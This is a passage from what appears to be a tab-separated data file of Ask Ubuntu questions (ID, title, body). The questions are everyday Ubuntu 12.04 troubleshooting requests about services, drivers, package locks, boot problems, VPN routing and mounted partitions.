ppa right now .
163020	how to check if openfire is running ?	i know that openfire 3.7.1 is installed because when i run ; apt-cache policy openfire that confirms it . but when i try ; /etc/init.d/openfire start the line resets like a successful command . if i browse to port 9090 , it wont connect . i verified that opening the ports is working in aws by installing apache . how can i check if openfire is running ? is there a separate issue why openfire does n't run ? is there a log i can check ?
163021	minimize function not working with internet browsers	when i go to minimize the window , it minimizes , but i ca n't recover it . if i go to the launcher it just opens a new window . also when i have a browser open the little arrow does n't appear by it in the launcher . is there any way to fix this ?
163022	underfined reference clock_gettime not solved by -lrt	i 'm trying to compile the program the source for which is here . as per his instructions i 'm compiling using the command g++ -o3 -lrt netmon.cpp -o netmon . i get this output : netmon.cpp : ( .text.startup+0xb3 ) : undefined reference to `clock_gettime' collect2 : ld returned 1 exit status this is odd as i have read that the rt library provides this function . what is going on ?
163025	system program problem detected	i have ubuntu 12.04 lts , fully up-to-date . i 'm new to ubuntu . whenever i start my system i face `` system program problem detected . '' why is this happening ? i ran sudo rm /var/crash/* but it again appears after some time . what could be at fault ?
163030	can not open lock file /var/lib/dpkg/lock permission denied -- even using sudo	i recently installed a fresh version of ubuntu lts 12.04 . i had been using lts 10.4 and saved my package.list and was planning on using $ > sudo dpkg -- set-selections < package.list & & apt-get dselect-upgrade to install the same packages in the new version however , the computer fails to run with the error e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? the simple answers to this would be am i root or a member of sudo ? $ > whoami surfer $ > groups surfer adm cdrom sudo dip plugdev lpadmin sambashare so much for the easy answer . per the similar post fixing `` could not get lock /var/lib/dpkg/lock '' the recommended solution is $ > sudo fuser -cuk /var/lib/dpkg/lock ; sudo rm -f /var/lib/dpkg/lock upon executing that command , my screen goes blank , the keyboard becomes unresponsive , and my only option is to press the power button and reboot ... ( i would have thought this was a malicious suggestion , but many others seemed to have liked it . ) i 've tried listing any programs that may be using /var/lib/dpkg/lock $ > sudo lsof lsof : warning : ca n't stat ( ) fuse.gvfs-fuse-daemon file system /home/surfer/.gvfs output information may be incomplete . note , there are no programs listed . similarly , no luck with $ > ps -e | grep -e apt -e adept | grep -v grep nothing listed . btw , i can run apt-get from the command line . $ > sudo apt-get update runs as expected and updates my package lists ... @ izx : after attempting your suggestion , i could not run $ > sudo dpkg -- set-selections < package.list & & apt-get dselect-upgrade it failed with the same error . i tried this a ) immediately following the rm command in the f1 terminal b ) executing the rm command and returning to x with ctrl+alt+f7 c ) executing the rm command and rebooting of interest only option c ) yielded a different ( but similar error message ) which was dpkg : error : dpkg status database is locked by another process although i can not kill the processes using /var/lib/dpkg/lock with fuser , i did get the following output for processes that are linked to it . $ > fuser -cv /var/lib/dpkg/lock user pid access command /var/lib/dpkg/lock : root kernel mount ( root ) /var surfer 1641 ... .m ( surfer ) gnome-settings- surfer 1656 ... .m ( surfer ) compiz surfer 1679 ... .m ( surfer ) nm-applet surfer 1688 ... .m ( surfer ) nautilus surfer 1731 ... .m ( surfer ) gtk-window-deco surfer 1733 ... .m ( surfer ) unity-panel-ser surfer 1831 ... .m ( surfer ) gnome-terminal surfer 1899 f ... . ( surfer ) unity-applicati surfer 2029 f ... m ( surfer ) update-notifier so i tried killing each process from the f1 terminal , and removed the lock file . no problem . the result was $ > fuser -cv /var/lib/dpkg/lock user pid access command /var/lib/dpkg/lock : root kernel mount ( root ) /var $ > ls /var/lib/dpkg/lock ls : can not access /var/lib/dpkg/lock : no such file or directory file and links seem to be gone , but upon executing the dpkg command , i get the same error ... and the lock file is back . i 'm really rather puzzled , and would welcome any help .
163032	why does n't bumblebee work with nvidia gt640m ?	i 've done a clean install of ubuntu 12.04 from a livecd on a samsung series 7 chronos with a 3rd gen i7 and the nvidia geforce gt 640m . i 've followed this : ( https : //wiki.ubuntu.com/bumblebee # installation ) to install bumblebee so i can switch to my discrete gpu . i have not used ironhide , or preivous bumblee since it 's a clean install . when i use optirun , optirun says it ca n't initialize the gpu : [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please [ error ] aborting because fallback start is disabled . i 've looked at the troubleshooting page for bumblebee and i have the correct driver and do not think i have aspci disabled . also , my keyboard becomes very unresponsive and my mouse skips and is n't smooth after optirun crashes . the only thing to fix this is a reboot . here 's my lspci | grep vga output : 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation device 0fd2 ( rev ff ) it seems ubuntu can see my graphics card . i do n't really know what 's going on .
163036	no boot , no bios after reformat , dual boot install	pc needed reformat so completed this with just after installing ubuntu onto my 2nd drive and had dual boot win7 and ubuntu 12.04 going fine ( except slow win , hence reformat ) . reformated , reinstalled win7 . updated all drivers and installed critical software in windows . once win7 stable , installed ubuntu 12.04 on 2nd drive . i chose top option in the install and let it complete some sort of partition ( although i see no other drive in win ) . so now when i start the pc after the install completed , it went straight to the win7 login screen . i attempted to put the ubuntu install disk in and it did start ubuntu after attempting to install and finding i already had a version . but this was not satifying enough for me . so i researched and found a tool , boot-repair disk . when i launch this , it basically takes me to a boot : terminal looking screen , but i am lost from what errors it was giving ( sorry , do n't have ) . i am a relative novice when it comes to ubuntu , but i know how great it is . but this is frustrating that the simple boot menu is not working . i am not sure even the best way to even start ubuntu ( very slow using install disk ) to try some other solutions . any direction is appreciated . btw , no bios options either anymore . this was a change since the install of 12.04
163039	how do i paste the contents of a folder into the www root folder ?	i want to take the contents of home/magpie/xoops-2.5.5/htdocs/ and put it into var/www using the terminal . i do n't want to go downloading anything i do n't need .
163043	unable to re-install vlc after a partial upgrade ( 12.04 ) due to broken packages	i did a partial upgrade early this morning and followed all the steps trustingly because it usually does n't cause problems after until now . vlc was unexpectedly removed without my knowing . i tried to re-install it via terminal but it showed this : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.0.2+git20120711+r286-0~r39~precise1 ) but it is not going to be installed depends : libvlccore5 ( > = 2.0.0 ) but it is not going to be installed recommends : vlc-plugin-notify ( = 2.0.2+git20120711+r286-0~r39~precise1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 2.0.2+git20120711+r286-0~r39~precise1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i tried doing it through the software center but it also gave me a similar message . how can i fix this and install vlc again ? thank you . i 'm using thinkpad r61i 64-bit 12.04 .
163045	microsoft lifecam cinema with ubuntu 12.04 : webcam light blinks , and freezes with guvcview	i am trying to use my usb microsoft lifecam cinema webcam with ubuntu 12.04 . when not in use , it blinks incessantly and seems to slow down my system . using google voice or guvcview , the camera works for 5 seconds and then freezes .
163051	can i dual-boot windows using a usb ?	virtualbox does n't like it and it seizes up even caused me to force shutdown a couple times tired of restarting and would like a side by side using ubuntu 12.04
163052	can i try ubuntu without affecting any of my existing files ?	my windows 7 got corrupted and doesnt boot on my dell 1558 studio laptop . now i decided to try out ubuntu before i reinstall windows . i downloaded the 701 mb ubuntu 12.04 iso and created the cd on my desktop . next i put the cd in my laptop and then press f2 to get to boot menu . now select cd . will i be able to start ubuntu directly from cd without losing my existing music , photos and documents ? its very important for me to keep my work documents secured . so can i start ubuntu without affecting any files from the cd and then install ubuntu fully on harddrive when i have backed up the files ?
163054	how do i delete a random line in a text file from a given range ?	i have a text file and i want to delete random lines from a range . here is an example : line 1 : abcd line 2 : efgh line 3 : ijkl line 4 : mnop line 5 : qrst line 6 : uvwxyz out of these six , i want to randomly delete , say , 3 . how to get that done ? it would be great if there is a solution in vim , so one can apply it on different ranges .
163060	why does my application crash without updating the log file ( used ' > my.log ' )	i am running mcruiseon server , which is a java based server side application ( sockets , multiple threads , memcached , mysql ) on a micro ec2 . it has been crashing often . i suspect memory usage may have killed it . how to you find out which program is using too much memory i read through this and it was very useful . now i need to know if my application crashed due to memory shortage . any system log that has that information ?
163061	eclipse on ubuntu 10 java-6-openjdk has missing jar 's	out of the blue , my eclipse is reporting missing jars in my java build path . netx.jar gnome-java-bridge.jar plugin.jar i wonder what i did wrong ? was it a upgrade that messed it up ? i am unable remove those jar 's from my the list aswell ( that is probably because my eclipse is not running as super user ) . just running as super user , removing those missing jar 's may not be the solution . any advice ?
163062	touchpad scrolling reloading web pages	i 'm using ubuntu 12.04 gnome classic . i 'm using firefox 13.0.1 . in my browser , while i use my touchpad to scroll up and down a page , previous web pages are simply being loaded again . eg : if i visited abcd.com , and then visited xyz.com , while scrolling through xyz.com , suddenly abcd.com will be loaded in the same tab . how can i disable this behavior of touchpad scrolling ? or is this a bug ?
163063	translating quickly application	i created an application using quickly create ubuntu-application myapp . then i created translations and created deb package quickly package to install and test it . when i run myapp all strings from glade files were translated but all strings from code were not translated . what 's this ? how to solve this problem ?
163064	upgrading to ubuntu 12.04 gives `` no package : header ''	i tried to upgrade to ubuntu 12.04 stable and when i did it is gives me this error : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/dl.google.com_linux_earth_deb_dists _stable_main_binary-i.386_packages e : the package list or status files could not be parsed or opened
163067	menu does not display in firefox 13 on xubuntu 12.04	i had a problem after update firefox to version 13 . when i start the firefox , it works . but for a while i ca n't click on firefox menu anymore . the right click menu does n't work either . i 'm using xubuntu 12.04 64 bits : linux minh-desktop 3.2.0-26-generic # 41-ubuntu smp thu jun 14 17:49:24 utc 2012 x86_64 x86_64 x86_64 gnu/linux . everytime i get this problem , i have to restart the firefox . please help . thank you .
163068	download of ubuntu fails	i 'm trying to download ubuntu 12.04 , i 'm a newbie to ubuntu , on a ms windows xp machine using opera ( have also tried ie ) but the download simply stops , with various % ages complete . i do n't believe this is a problem with my machine as i 've downloaded other things successfully both before and after failed attempts to download ubuntu . any suggestions or are there mirror sites i might use ?
163069	what additional security measures should i apply for ubuntu ?	so on my windows 7 install , i 've got multiple free malware/virus scanners and a firewall up . but i 've heard that ubuntu ( or linux in general ) is much more secure by default . so what additional security measures should i take , other than the obvious precautionary measures ( aka avoiding shady ppas ) ? should i install a lightweight firewall or something of the sort ? or is the security i get with ubuntu out-of-box going to be enough for daily web-browsing ? i 'd rather not have to install too much software , i 'd like to keep this pc running as fast and light-weight as possible . also , if i should have the misfortune of getting my linux install completely messed up ( say , i install a malicious software package ) , is there any way i can prevent this digital fire from spreading to my windows partition ? in general , i 'm just trying to find out whether or not i can just jump into cyberspace with nothing but common sense and linux 's built-in protections to safeguard me .
163072	openvpn client web traffic setting problems	i have setup an openvpn access server in my vps . and now l 'm living china , the goverment blocks the many foreign sites such as facebook and twitter . i can use the vpn server the cross the firewall of china to access twitter and so on through my desktop running the windows xp . however , my laptop running xubuntu 12.04 can not break through the national firewall . i can connnet the vpn server by the openvpn termial client in ubuntu by the command `` sudo openvpn -- config client.ovpn '' as the desktop works okay , i think the setting of the vpn access server is okay . is there any sepcial setting in ubuntu client ? i did n't change the configuration provided by the openvpn access server . i googled the problem a lot , the iptables instructions made me quite confused . and i open the ip forward in ubuntu as well . still not works . the original route table in xubuntu : 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 173.224.215.16 192.168.0.1 255.255.255.255 ugh 0 0 0 wlan0 192.168.0.0 0.0.0.0 255.255.255.0 u 2 0 0 wlan0 the route table after connecting to the vpn : 0.0.0.0 5.5.0.1 128.0.0.0 ug 0 0 0 tun0 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 wlan0 5.5.0.0 0.0.0.0 255.255.248.0 u 0 0 0 tun0 46.x.x.x 192.168.0.1 255.255.255.255 ugh 0 0 0 wlan0 128.0.0.0 5.5.0.1 128.0.0.0 ug 0 0 0 tun0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 173.224.215.16 192.168.0.1 255.255.255.255 ugh 0 0 0 wlan0 192.168.0.0 0.0.0.0 255.255.255.0 u 2 0 0 wlan0 46.x.x.x is the public ip of my vps . client.ovpn : ... setenv forward_compatible 1 client server-poll-timeout 4 nobind remote 46.x.x.x 1194 udp remote 46.x.x.x 1194 udp remote 46.x.x.x 443 tcp remote 46.x.x.x 1194 udp remote 46.x.x.x 1194 udp remote 46.x.x.x 1194 udp remote 46.x.x.x 1194 udp remote 46.x.x.x 1194 udp dev tun dev-type tun ns-cert-type server reneg-sec 604800 sndbuf 100000 rcvbuf 100000 auth-user-pass # note : lzo commands are pushed by the access server at connect time . # note : the below line does n't disable lzo . comp-lzo no verb 3 setenv push_peer_info ... i omit the ca , keys , etc . thanks in advance .
163073	cheese is not working with ubuntu 11.10 in hpg62 laptop	when i run cheese in terminal , it gives following message and cheese comes up with black screen , and nothing works in it . any help will be highly appreciated . ( cheese:2966 ) : gtk-warning ** : attempting to add a widget with type gtkimage to a gtkbutton , but as a gtkbin subclass a gtkbutton can only contain one widget at a time ; it already contains a widget of type gtklabel ** ( cheese:2966 ) : warning ** : could not get buffers from device '/dev/video0 ' . ** ( cheese:2966 ) : warning ** : could not map buffers from device '/dev/video0' ** ( cheese:2966 ) : warning ** : could not negotiate format
163077	are there any automated functionality tests for an ubuntu installation ?	i have installed ubuntu on my mips architecture machine ( it is not an x86 ) . i want to test if the applications are working well . i want to use automation test methods to do it , but how can i accomplish this ? are there any references or suggestions to do this ? by the way , most of the tests are functions in the gui , such as gedit , firefox , power manager , etc
163081	setting up my www directory correctly	i 'm quite new to ubuntu and linux in general . i need to create a my www directory ( in /home ) and set the permissions/ownership correctly so that any new files and directories created by myself ( via terminal etc , username is matt ) or the web server ( nginx in this case ) are owned by matt : www-data . i believe i need to do something with setfacl but i 'm not sure how to do it correctly . thanks in advance .
163082	how to install lexmark x6650 driver ( .sh.tar ) file in ubuntu 11.10	when i connected my printer to my pc , he found drivers & installed them . i thought everything would work , but when i did a testpage , the pc acts likes he 's doing the job great , but the printer did n't do anything . so i searched on www.lexmark.be & i found ( i think ) an additional download : lexmark-08z-series-driver-1.0-1.i386.deb.sh.tar-1 . now it have to be extract , but i do n't know where i have to do that . ( i 'm new in linux ! )
163084	upgrading ubuntu chroot environment ?	what is the proper way to upgrade ubuntu chroot environment to a newer ubuntu release ? the chroot environment has been originally set up using debootstrap . the proper way to upgrade a ubuntu server is to use do-release-upgrade command . ubuntu is based on debian . debian can be upgraded by replacing the release name in /etc/apt/sources.list with the new release name and running apt-get update , apt-get upgrade and apt-get dist-upgrade . which one is the proper way to upgrade a ubuntu chroot environment ? what does do-release-upgrade do differently from the debian way ?
163085	ubuntu 12.04 lts graphics problem , booting to tty	since i upgraded my computer to 12.04 from 11.04 nothing works anymore . my hardware : intelâž coreâ˘2 duo nvidia graphics card first i had problems running the my old user ( i guessed it had something to do wie id and gid ) , so i just saved everything and deleted that account . but still everything was running unstable and i figured out it must be because i had win vista also running on this computer , so giving ubuntu another chance i reinstalled everything , including deleting all partitions so ubuntu would be the only os . and still everything was running horrible , like the system was very slow , the screen was having little blackouts like ( i think all relating to the graphics card ? ) . i thought it might be because lightdm is unstable so i uninstalled it and put gdm on ( i already used falback-session because of it 's more convenient look ) . it was running ok after that ( not fast though , still screen problems , etc ) but suddenly it started booting into the terminal . i tried running startx and it seemed to load but then the system froze . now i 'm running from the livecd ( which works totally fine ! ? ) . i 'm very desperate and i 'd like to give ubuntu a 5th ( or something ) chance but i wo n't work with a totally unstable system . please help !
163087	lubuntu 12.04 right alt to change keyboard layout while pressed - a bug ?	after setting the keyboard layouts and switching with this command setxkbmap -option grp : switch , grp : lwin_toggle , grp_led : scroll us , it everything works fine ( 2 layouts us and it , toggle between them with left super key ) but when i have us layout and keep pressed the right alt the layout switches to it until i release it , anyone knows why it is like this and how to fix ? update : i realize that the option `` grp : switch '' caused the problem . the correct command is setxkbmap -option grp : lwin_toggle us , it
163094	are files moved or copied from desktop to ubuntuone folder ?	when i copied files from desktop to the ubuntuone folder , it looks like they got moved . i was expecting to see copy to be left behind on the desktop . when i copy files from windows folders to ubuntuone , the files are still seen on windows . so it looks like they are 'copied ' rather than 'moved ' . is the behavior different between ubuntu ( 11.04 natty ) and windows 7 ? thanks
163096	how do i apply the fixes suggested from the app review board to my app ?	i submitted my app to the ubuntu software centre , and it just got reviewed by the ubuntu app review board ( arb ) . i got an e-mail suggesting some fixes , and i 'm not sure about the next steps i should follow to fix my app .
163103	what graphical logfile analyzers are available ?	does anybody know a good graphical logfile analyzer for ( mainly ) syslog messages from ubuntu ? maybe one that converts the text-based messages in objects to sort/group/filter messages like windows ' logfile viewer . as alternative more comfortable terminal tools than combinations of grep/sed/cat/less are also appreciated ( or a very good combination ? : p )
163110	undefined reference to gdk function	i have a gtk program in which i am trying to call a gdk function . i have the following include files : # include < gtk/gtk.h > # include < gdk/gdk.h > and am compiling with the following : gcc `pkg-config -- cflags -- libs gtk+-2.0 cairo glib-2.0 gdk-2.0` gtk_fixed.c widget.c node.c line.c i am getting the following error : undefined reference to `gdk_device_ungrab' can anyone point me in the right direction as to how to fix this ? thanks .
163122	ca n't paste password into ubuntu software center log-in field	when i click on the buy button in the software center it instructs me to login , however as i 'm using keepass for saving my passwords i would like to paste it in but it wont let me ... the same applies to gwibber when i try to input my facebook password . it is possible to input manually but since i picked a long password this would take very long . unfortunately until now i could n't find a solution other than just not logging in or stop using the password manager . does anyone have an idea ?
163123	what sort of a performance hit can i expect if i use bumblebee and wine with an optimus laptop ? can i even use bumblebee in ivy bridge ?	i plan to buy a new laptop sometime and i have been doing a lot of research trying to find the best one . unfortunately a lot laptops include optimus and it has very little linux support . i have a laptop in mind that seems nice to me , but unfortunately it has optimus . i am stuck in an unfortunate spot . i could spend more money on a laptop with a more expensive gtx670 or gtx675 graphics card , and because these cards do not appear to have optimus i might have a better time using them with ubuntu in the first place as well as not have to take a performance hit . the thing is , i do not particularly need such a high end graphics card . a gtx650m or gtx660m will suit my needs , if it gets a frame rate comparable to what it would on windows , or a slight penalty . i also prefer the laptops with these weaker cards because they tend to be a pound or two lighter and they have vents on the side instead of the side and back or only back . so that is the back story . my question is , how many fps hit can i expect to take as compared to windows 7 performance if i use bumblebee to get optimus support ? also , how many fps hit can i expect to take from wine ? i have used wine before but never in a situation where i am cutting it so close on the fps i need versus the fps i expect to get with the graphics card i want . even if i use a gtx650 on windows i will be cutting it close , with only a few fps to spare while being able to maintain the graphics settings i would prefer . so if the hit is only a few fps it will be fine , and if it is a few more a gtx660m will probably be okay . but if it is a huge difference , i might be forced to shell out more bucks for a laptop that i like less just to be able to avoid optimus ! ! some feature . one more thing . will bumblebee work on any optimus laptop , even if it is ivy bridge ? i would hate to spend over a thousand dollars on a laptop and find that i can not use ubuntu with it .
163127	blackjack game for linux or wine ?	i 've been looking for a decent blackjack game that will run under linux . i read a man page for blackjack which said it was in the gnome-games package . i did a : sudo apt-get install gnome-games but no blackjack showed up . i tried blackjack_for_the_hopelessly_luckless but it is very basic with only totals , no soft hands , no pair splitting etc . i 'm looking for a game to practice my strategy before blowing some money at the casino . anyone got any suggestions ? would prefer gpl but will buy a cd-rom if i have to .
163137	hiding the unity launcher and it 's still opening apps	i currently have compiz running with ubuntu 12.04 . i use the 'rotate cube ' a lot and i like being able to click on the edges of the screen to rotate right and left . with the introduction of the unity launcher i change this behaviour to being able to rotate right and left by clicking on the right edge with the left or right buttons . but old habits die hard and i tried ( auto- ) hiding the launcher and enabling rotate left by clicking on the left edge of the screen . unfortunately ( while it does indeed rotate left ) ubuntu still launches the app that would have been where i clicked if i had n't of hidden the launcher . i still want to utilize the launcher , i just do n't want it open applications when it 's hidden and i 'm clicking on the left edge to rotate the cube is there anyway i can remove this behaviour ?
163138	how do i find what version of libc my application links to ?	when building an application using g++ , i am not explicitly passing the libc library as a library to link to in the same way you would for other libraries ( like passing -lpthread for example ) . i know that libc has the so name libc.so.6 but i am aware that this is not actually a library but something like a pointer to another version of libc ( such as libc-2.15.so ) . my question is if i had multiple versions of libc on my computer , how can i tell which one actually gets linked to through the libc.so.6 .
163139	ubuntu 12.04 - usb3 issue with mobile broadband usb sticks	i am getting a very strange problem as regards the usb3 port of my laptop under ubuntu 12.04 ( my laptop is a dell inspiron n14z ) . the laptop has two usb3 ports and one usb2 port . in order to get any usb mobile broadband stick ( s ) to work , i have to plug them in the usb2 port . they are immediately recognised and i can connect . if i plug them in one of the two usb3 ports , they are not recognized . i even get different results from lsusb . i have tried this with four different usb sticks . one of o2 , one of vodaphone , one of windhellas , and one of cosmotehellas . three of them are huawei and one of them is a k3570-z . as an example of a huawei e173 : lsusb result when plugged in usb2 : bus 002 device 005 : id 12d1:1436 huawei technologies co. , ltd. lsusb result when plugged in usb3 : bus 003 device 003 : id 12d1:1446 huawei technologies co. , ltd. e1552/e1800 ( hspa modem ) i do n't think that this problem has anything to do with the laptop brand or the mobile broadband usb sticks . the reason for that is that on the same laptop the usb sticks work just fine on all usb ports when i am running windows 7 or ubuntu 11.04 . so this must be somekind of a bug relating to ubuntu 12.04 . is anyone else experiencing the same problem ? i thank you very much in advance for any of your thoughts/ideas/assistance .
163141	drivers for realtek wireless module for toshiba c850-a965 ?	i just bought a new toshiba system , and before installing ubuntu , i tried it out on a live cd . unfortunately , ubuntu does n't recognize any wireless adapter . $ sudo lshw -c network *-network unclaimed description : network controller product : realtek semiconductor co. , ltd. vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : ioport:3000 ( size=256 ) memory : c2400000-c2403fff from the above output , i think that my realtek wireless chip is unrecognized as what it is . but in my experience , all the realtek devices worked out of the box . furthermore , regardless of the manufacturer even if the appropriate drivers were not available , at least the devices were recognized for what it is properly . additional drivers does not detect any proprietary drivers for me to install . ( i have yet to install ubuntu , and ran additional drivers after updating repository lists ) wireless works on windows 7 after installing necessary drivers . that is to say , there is no problem with the hardware , i 'm befuddled why the hardware is not recognized at all ( refer to the lshw output above ) . as far as i am aware , even hardwares requiring proprietary drivers to function would at least be recognized in lshw output and such . lspci -nn | grep network shows : 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. device [ 10ec:8723 ]
163153	12.04 lts wo n't boot . no boot option . installed along side vista 64 ultimate	i installed 12.04 lts on my computer that already had vista 64 ultimate . installation said that reboot was necesarry to use the new installation . well , it just boots right into vista without giving me a boot option for ubuntu . any help would be much appreciated . i 've installed and used ubuntu in the past , but i still consider myself a newbie .
163155	how do i access my remote ubuntu server via x-windows from my mac ?	i have an ubuntu server ( 12.04 lts ) running remotely on a cloud hosting service . i have installed ubuntu-desktop via apt-get : $ sudo apt-get install ubuntu-desktop it appears to have installed no problem . i have confirmed that /etc/ssh/ssh_config on the server contains the lines forwardagent yes forwardx11 yes forwardx11trusted yes and that /etc/ssh/sshd_config on the server contains the line : x11forwarding yes i then rebooted the server . it came back up no problem . now , starting x11.app on my mac i am presented with an xterm . i connect to my server from this terminal using : $ ssh -x < myhost > and i connect to the server , no problem . at this point i do n't know what to do . i have tried $ sudo startx but i get a `` no screens found '' error . i do n't have screens because its a headless cloud server , but i just want to acces it from my mac through x . what now ?
163159	installing gnome-shell extensions from extensions.gnome.org	i am not able to install the shell extensions from extensions.gnome.org in my ubuntu 12.04 64 bit . i can see the on/off button near the extensions and when i press the on button , i even get the install confirmation , but nothing happens after that .
163161	one desktop per monitor	it is possible to configure a desktop per monitor in ubuntu 12.04 ? if i enable 'simple desktop ' in catalyst driver , one of my two screens is blank . when i move my mouse in the blank screen , i have a cross .
163162	are softwares installable on ubuntu also installable on lubuntu ?	i have a very low end pc , 512mb , and i 'm thinking of switching to ubuntu . but i want the lightest one possible , i did a few searches and came across lubuntu . are softwares installable on ubuntu also installable on lubuntu ?
163163	how to change shortcuts for moving windows to the screen edges ?	i 'm running ubuntu 12.04 under gnome-shell . when i press ctrl-alt-kp_left , the active window moves to the left edge of the screen , likewise for right , up , and down . kp_5 maximises/restores the window . ( fascinatingly , moving the window to the left or right at the same time moves it down a bit each time . ) i do n't like that , as it interferes with certain eclipse shortcuts , but i ca n't find a place to change these settings . in gconf-editor , i navigated to /apps/metacity/window_keybindings and found that move_to_side_e was set to superkp_left , and so on . i changed all these to disabled , to no avail ( i tried logging out an in again . ) how can i change these shortcuts ?
163164	boss gt-100 on ubuntu 12.04	i wish to use boss gt-100 for recording some sound in ubuntu 12.04 . when i connect this device via usb and power it on , i see it in lsusb , but it seems that it is not recognized to be an audio device . i followed these instructions : boss gt-100 on linux , but it is still not recognized . what should i do ?
163165	wireshark installation	i downloaded wireshark-1.8.0rc2.tar.bz2 and copied it to /opt/wireshark directory and uncompressed it by sudo tar -xjvf wireshark-1.8.0rc2.tar.bz2 then by doing ls in the extracted folder , i found the configure file . then i did ./configure then i got this problem : configure : error : i could n't find yacc ( or bison or ... ) ; make sure it 's installed and in your path . how to fix it ?
163175	what 's the preferred workaround until /etc/rc.local bug is fixed ?	i have some commands that i need to run at startup . i wanted to put them in /etc/rc.local but this does n't work ( bug report ) . i 've seen a number of different workarounds and i 'm sure they all work , but i 'm wondering if there is a preferred or even best way to do it ? i mean one that might avoid potential complications , or one that may be considered to be best practice in such a situation ? i 'm using linux for business purposes ( since windows died on me yesterday ) . i 'm keen to avoid causing more issues than i am fixing . thanks in advance .
163176	how do i get chromium to show pdfs using evince ?	is there any way to get chromium to use a mozpluggerrc/evince combination to show pdfs embedded into its own window ? right now , chromium is just downloading pdfs . i can open them in an external evince window by clicking on the downloaded file . i am using chrome 18.0.1025.168 under ubuntu 12.04 ( amd64 ) . here 's the pdf section of my /etc/mozpluggerrc.d/62-documents.conf : application/pdf : pdf : pdf file application/x-pdf : pdf : pdf file text/pdf : pdf : pdf file text/x-pdf : pdf : pdf file repeat noisy swallow ( evince ) fill needs_xembed : evince `` $ file '' mozpluggerrc does show up in about : plugins . btw , this works just fine in firefox . note : i am not looking for hints on how to use google chrome 's pdf plugin in chromium .
163177	broadcom bcm4318 [ airforce one 54g ] losing connection	i 've done everything in the ubuntu forums and in ask ubuntu and i got it working the wifi . the wifi card is an broadcom bcm4318 [ airforce one 54g ] on a acer aspire 3630 . but the wireless connection does n't stay connected . it loses connection repeatedly . i 'm forced to my wired connection . what can i do to get the laptop to stay connected and not lose connection the whole time ?
163179	firefox starting before network is up	we have this machine ( ubuntu 10.04 ) with autologon and firefox in startup sesson aplications . but some times the firefox starts , and the network is not up ( maybe a delay from dhcp server , or some weird problem in networking ) . how we change the order of applications of startup session applications ? and how we can define to firefox only start after the network is up ?
163182	how to re-enable a disabled standard user account ?	disabled a standard user account but did not opt to delete files . later , tried to enable the account . at that time , a password had to be selected so entered a different one from the earlier one . now , at the log-in screen the user account appears but can not log in using the new password or the old password . tried many tricks but still could not let the user log into the account . the tricks : tried to find some command in 'lightdm ' package to modify the user account . could n't solve the problem . { ex . /etc/lightdm/lightdm.conf } removed the package 'apparmor ' suspecting it is causing the problem . it did n't solve the problem . installed some packages from synaptic , relevant to user accounts . no luck . browsed in system folders such as 'var ' , 'etc ' , 'bin ' , 'root ' and many others , to find a clue so that the user account can be re-enabled . no way ! from system settings , selected auto log-in without password . even then the user still ca n't log in . runnng sudo passwd username in terminal takes me to the log in screen . hope these details would be of help . still trying to solve the issue . well , finally i decided to delete that user and recreate a new user account with a slightly different name . most files which had been backed up could be restored , although some were lost . all users should be asked to back up whatever files which are important using a tool such as deja dup . so in case of an issue like this , even if the user account gets deleted one can still recover the files .
163184	persistent `` disk will be checked ... '' in the message of the day ( motd ) even after reboot	i see that there are some other threads that mention this error , but i have tried the solutions with no luck . when i log into my 12.04 server , i get the message : /dev/sdb1 will be checked for errors at next reboot /dev/sdc1 will be checked for errors at next reboot the problem is that the check is never done and i continue to get the messages . i ran a fsck on both drives and they are fine .
163191	why ca n't i write to my mounted vfat partition ?	i reinstalled ubuntu yesterday , and after using 'disk utility ' one of my partitions does n't allow to get files saved . this is what the fstab file looks like proc /proc proc nodev , noexec , nosuid 0 0 # entry for /dev/sda9 : uuid=22d34341-7a5b-4d89-a3c0-6e147bc08dea / ext4 errors=remount-ro 0 1 # entry for /dev/sda2 : uuid=8e4460d94460c615 /media/recovery ntfs defaults , nls=utf8 , umask=0222 0 0 # entry for /dev/sdc1 : uuid=1a2774677a17f3f7 /media/trascend ntfs defaults , nosuid , nodev , uhelper=udisks , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 0 0 # entry for /dev/sda3 : uuid=9ed06370d0634d99 /media/sda3 ntfs nls=iso8859-1 , rw , umask=000 0 0 # entry for /dev/sda5 : uuid=b239-5bd2 /media/sda5 vfat iocharset=utf8 , rw , umask=000 0 0 # entry for /dev/sda6 : uuid=660325b85226874e /media/sda6 ntfs-3g users 0 0 # entry for /dev/sda7 : uuid=568a57020a03d259 /media/sda7 ntfs nls=iso8859-1 , umask=000 , user 0 0 # entry for /dev/sda8 : uuid=0ab8649b-acb5-4897-a44a-2b95856aef65 none swap sw 0 0 /dev/sda5 /media/sda5 vfat defaults 0 0 the one giving me problems is `` sda5 '' and it seems to appear twice , one time at the very end .
